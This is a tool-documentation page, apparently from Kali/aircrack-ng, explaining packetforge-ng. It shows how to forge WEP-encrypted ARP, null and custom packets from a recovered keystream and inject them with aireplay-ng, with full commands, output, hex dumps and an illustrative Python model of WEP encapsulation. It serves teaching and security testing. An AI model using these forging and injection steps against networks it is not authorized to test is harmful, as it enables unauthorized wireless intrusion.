Forging ARP, UDP, ICMP or custom packets with packetforge-ng

The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as ARP requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection.

To create an encrypted packet, you must have a PRGA (pseudo random generation algorithm) file, i.e. a recovered keystream. This is used to encrypt the packet you create. It is typically obtained with the aireplay-ng chopchop or fragmentation attacks.


root@kali:~# packetforge-ng --help

Packetforge-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org

Usage: packetforge-ng <mode> <options>

Forge options:

-p <fctrl>     : set frame control word (hex)
-a <bssid>     : set Access Point MAC address
-c <dmac>      : set Destination  MAC address
-h <smac>      : set Source       MAC address
-j             : set FromDS bit
-o             : clear ToDS bit
-e             : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source      IP [Port]
-t ttl         : set Time To Live
-w <file>      : write packet to this pcap file
-s <size>      : specify size of null packet
-n <packets>   : set number of packets to generate

Source options:

-r <file>      : read packet from this raw file
-y <file>      : read PRGA from this file

Modes:

--arp          : forge an ARP packet    (-0)
--udp          : forge an UDP packet    (-1)
--icmp         : forge an ICMP packet   (-2)
--null         : build a null packet    (-3)
--custom       : build a custom packet  (-9)

--help         : Displays this usage screen

Usage Example

Generating an ARP request packet

Here is an example of how to generate an ARP request packet.

First, obtain an .xor file (the PRGA) with either the aireplay-ng chopchop or fragmentation method.

Then use the following command:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Where:

  • -0 indicates you want an ARP request packet generated
  • -a 00:14:6C:7E:40:80 is the Access Point MAC address
  • -h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
  • -k 192.168.1.100 is the destination IP, i.e. in an ARP request the “Who has this IP”
  • -l 192.168.1.1 is the source IP, i.e. in an ARP request the “Tell this IP”
  • -y fragment-0124-161129.xor is the file containing the PRGA (keystream) obtained in the previous step
  • -w arp-request is the file the forged packet is written to

Assuming you are experimenting with your own access point, the ARP request packet generated above can be decrypted with your own key. To confirm that the packet we just created decrypts correctly, enter:

airdecap-ng -w <access point encryption key> arp-request

The results look like this:

Total number of packets read             1
Total number of WEP data packets         1
Total number of WPA data packets         0
Number of plaintext data packets         0
Number of decrypted WEP  packets         1
Number of decrypted WPA  packets         0

To view the packet that was just decrypted, enter tcpdump -n -vvv -e -s0 -r arp-request-dec (airdecap-ng writes the decrypted packets to arp-request-dec).

The results look like this:

reading from file arp-request-dec, link-type EN10MB (Ethernet)
18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1

This is exactly what we expected. Now you can inject this ARP request packet as follows: aireplay-ng -2 -r arp-request ath0.

The program will respond as follows:

      Size: 68, FromDS: 0, ToDS: 1 (WEP)

           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:0F:B5:AB:CB:9D

      0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
      0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
      0x0020:  49fc 21ff 781a dc42 2f96 8fcc 9430 144d  I.!.x..B/....0.M
      0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
      0x0040:  d64f b709                                .O..

Use this packet ? y

Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

By entering “y” above, the packet you created with packetforge-ng is then injected.

Generating a null packet

This option allows you to generate LLC null packets. These are the smallest possible packets and contain no data. The “-s” switch sets the size of the packet manually. This is a simple way to generate small packets for injection.

Remember that the size value (-s) defines the absolute size of the unencrypted packet, so you need to add 8 bytes to get its final length after encryption (4 bytes for the IV and key index and 4 bytes for the ICV). This value also includes the 802.11 header, which is 24 bytes long.

The command is:

 packetforge-ng --null -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor

Where:

  • --null means generate a LLC null packet (requires a double dash).
  • -s 42 specifies the packet length to be generated.
  • -a BSSID is the MAC address of the access point.
  • -h SMAC is the source MAC address of the packet to be generated.
  • -w short-packet.cap is the name of the output file.
  • -y fragment.xor is the name of the file containing the PRGA.
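The ARP request section and the null-packet size rule above describe what packetforge-ng does with a PRGA file and how the -s value relates to the length of the frame on the air. The following Python model is added here as an illustration; it is not code from packetforge-ng or from the original article. It builds the same kinds of frames in software: an LLC/SNAP ARP request (as in the -0 example, with -l as sender IP and -k as target IP) or a zero-filled null body for a given -s, wraps either in a WEP data frame by computing the CRC-32 ICV and XORing with a keystream, and then decapsulates and checks the result the way airdecap-ng reports decrypted versus undecrypted packets. The keystream, IV and addresses are constructed sample values standing in for a real .xor file (whose on-disk format is not modelled), and the zero-filled null body is a placeholder for whatever bytes the tool actually emits. It also enforces the caveat that the PRGA must be at least as long as the body plus ICV, and shows that an encrypted ARP request comes out at 68 bytes, the size aireplay-ng reported in the example above.

```python
import socket
import struct
import zlib

# Constructed sample inputs (not from the page's capture): a 64-byte keystream
# standing in for the contents of a PRGA .xor file, a 3-byte IV, and the MAC
# addresses used in the page's example command.
SAMPLE_KEYSTREAM = bytes((i * 37 + 11) & 0xFF for i in range(64))
SAMPLE_IV = b"\x6c\x48\x00"
AP_MAC = bytes.fromhex("00146c7e4080")
SRC_MAC = bytes.fromhex("000fb5abcb9d")
BROADCAST_MAC = b"\xff" * 6

DOT11_HDR_LEN = 24  # frame control, duration, addr1-3, sequence control
WEP_OVERHEAD = 8    # 3-byte IV + 1-byte key index in front, 4-byte ICV at the end
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"  # DSAP/SSAP/ctrl, OUI, ethertype ARP


def dot11_data_header(bssid, src, dst):
    """24-byte 802.11 data header with ToDS=1 and the Protected (WEP) bit set."""
    frame_control = b"\x08\x41"  # type=data; flags: ToDS (0x01) | Protected (0x40)
    duration = b"\x00\x00"
    seq_ctrl = b"\x00\x00"
    # With ToDS=1 the address order is addr1=BSSID, addr2=source, addr3=destination.
    return frame_control + duration + bssid + src + dst + seq_ctrl


def build_arp_request(sender_mac, sender_ip, target_ip):
    """LLC/SNAP + ARP 'who-has target_ip tell sender_ip' (36 bytes). -l is sender, -k is target."""
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4, 1,  # Ethernet, IPv4, hlen, plen, opcode=request
                      sender_mac, socket.inet_aton(sender_ip),
                      b"\x00" * 6, socket.inet_aton(target_ip))
    return LLC_SNAP_ARP + arp


def parse_arp_request(body):
    """Return (sender_ip, target_ip), the 'tell' and 'who-has' addresses tcpdump prints."""
    if body[:8] != LLC_SNAP_ARP:
        raise ValueError("not an LLC/SNAP ARP frame")
    _, _, _, _, op, _, spa, _, tpa = struct.unpack("!HHBBH6s4s6s4s", body[8:36])
    if op != 1:
        raise ValueError("not an ARP request")
    return socket.inet_ntoa(spa), socket.inet_ntoa(tpa)


def build_null_body(size):
    """Zero-filled placeholder payload so that 802.11 header + body == -s <size>."""
    body_len = size - DOT11_HDR_LEN
    if body_len < 0:
        raise ValueError("-s must be at least the 24-byte 802.11 header")
    return b"\x00" * body_len


def encrypted_length(unencrypted_size):
    """Length on the air of a frame whose unencrypted size (header included) is given."""
    return unencrypted_size + WEP_OVERHEAD


def wep_encapsulate(header, body, keystream, iv, key_index=0):
    """WEP-protect body under a known keystream: ICV = CRC-32 of body, then XOR with the PRGA."""
    icv = struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    clear = body + icv
    # The recovered keystream must cover the body plus the 4-byte ICV; a shorter
    # PRGA cannot yield a valid frame of this size.
    if len(keystream) < len(clear):
        raise ValueError(f"PRGA too short: need {len(clear)} bytes, have {len(keystream)}")
    cipher = bytes(c ^ k for c, k in zip(clear, keystream))
    return header + iv + bytes([(key_index & 3) << 6]) + cipher


def wep_decapsulate(frame, keystream):
    """Reverse wep_encapsulate; returns (body, icv_ok) as airdecap-ng would judge the frame."""
    cipher = frame[DOT11_HDR_LEN + 4:]
    clear = bytes(c ^ k for c, k in zip(cipher, keystream))
    body, icv = clear[:-4], clear[-4:]
    icv_ok = struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF) == icv
    return body, icv_ok


def forge_arp_frame(sender_ip, target_ip, keystream=SAMPLE_KEYSTREAM, iv=SAMPLE_IV):
    header = dot11_data_header(AP_MAC, SRC_MAC, BROADCAST_MAC)
    return wep_encapsulate(header, build_arp_request(SRC_MAC, sender_ip, target_ip), keystream, iv)


def forge_null_frame(size, keystream=SAMPLE_KEYSTREAM, iv=SAMPLE_IV):
    header = dot11_data_header(AP_MAC, SRC_MAC, BROADCAST_MAC)
    return wep_encapsulate(header, build_null_body(size), keystream, iv)


if __name__ == "__main__":
    frame = forge_arp_frame("192.168.1.1", "192.168.1.100")
    body, ok = wep_decapsulate(frame, SAMPLE_KEYSTREAM)
    print(len(frame), ok, parse_arp_request(body))  # 68 True ('192.168.1.1', '192.168.1.100')
```

Running the block prints the on-air length, the ICV verdict and the parsed tell/who-has pair. Note that the ICV is a plain CRC-32, not a keyed integrity check, so anyone holding a keystream can produce frames the access point accepts without ever knowing the WEP key; that property is what packetforge-ng relies on, and it is one of the reasons WEP offers no real protection and should be retired in favour of WPA2/WPA3.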

Generating a custom packet

If you want to generate a custom packet, first create a packet with the tool of your choice. This could be a specialized tool, a hex editor or even a packet from a previous capture. Then save it as a pcap file. Following this, run the command:

 packetforge-ng -9 -r input.cap -y keystream.xor -w output.cap

Where:

  • -9 means generate a custom packet.
  • -r input.cap is the input file.
  • -y keystream.xor is the file containing the PRGA.
  • -w output.cap is the output file.

When it runs, packetforge-ng will ask you which packet to use and then output the file.

Usage Tips

Most access points really don’t care what IPs are used for the arp request. So as a result you can use 255.255.255.255 for source and destination IPs.

So the packetforge-ng command becomes:

 packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request

Usage Troubleshooting

Including both -j and -o flags

A common mistake is to include either or both of the -j and -o flags and so create invalid packets. These flags adjust the FromDS and ToDS flags in the generated packet. Unless you are doing something special and really know what you are doing, don’t use them. In general, they are not needed.

Error message “Mode already specified”

This is commonly caused by using the number one (-1) instead of a dash followed by lowercase L (-l) in the command.

Entering:

 packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -1 255.255.255.255 -y 00:14:6C:7E:40:80-03-00-14-6C-7E-40-80.xor -w arp-request

Gives:

 Mode already specified.
 "packetforge-ng --help" for help.

This is because -1 (the number one) was used instead of the correct -l (the letter ell). Simply use “-l” instead.

Source:

Author: Thomas d’Otreppe, Original work: Christophe Devine

License: GPLv2
